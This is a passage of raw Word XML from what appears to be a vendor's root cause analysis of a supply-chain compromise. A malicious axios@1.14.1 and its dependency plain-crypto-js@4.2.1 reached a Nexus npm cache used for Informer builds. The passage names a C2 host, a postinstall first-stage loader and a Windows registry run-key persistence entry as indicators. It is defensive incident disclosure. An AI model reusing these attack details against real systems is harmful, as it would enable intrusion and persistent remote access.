      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA9A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Their Informer deployment server did </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> already have a locally </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-cached version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> satisfying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>^1.12.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with a matching entry in their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>lock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> or hidden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/.package</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>lock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lockfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which would have prevented the Nexus fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA9B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, clients who develop plugins for Informer or who install Informer via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly are most likely to have downloaded a vulnerable version of the library either through the build artifacts or your own local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> caching mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA9C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its malicious dependency </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-js@4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> were installed, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> script would have automatically executed the first-stage loader during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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>; no additional user interaction required. Whether the second-stage RAT was successfully deployed depends on whether the C2 server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>sfrclak.com:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) was still operational at the time of the client's installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA9D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CRITICAL NOTE FOR WINDOWS DEPLOYMENTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the second-stage RAT was deployed on a Windows system, the persistence mechanism (registry run key at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>HKCU:\...\Run\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>MicrosoftUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) means the RAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SURVIVES REBOOTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and continues to operate even after the compromised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is removed from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation on Windows requires explicit removal of ALL persistence artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA9E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278CFA9F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As of the writing of this RCA, we have not received any reports from clients or Entrinsik employees confirming a successfully compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAA0" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>6. Detection &amp; Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAA1" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was discovered in Entrinsik's Nexus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry cache on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>April 8, 2026 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">8 days after the upstream attack) when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a client reported that a security scan flagged an attempted attack by the package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a known compromised artifact during their installation of the Informer 2025.2.12 upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAA2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon receiving the client report, Entrinsik confirmed the presence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the builds Nexus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry cache and initiated the remediation response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAA3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>7. Remediation Actions Taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAA4" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.1 Immediate Response (April 8, 2026)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9327" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="449"/>
        <w:gridCol w:w="7470"/>
        <w:gridCol w:w="1408"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAA8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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A5" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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A6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408"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A7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAAC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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A9" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
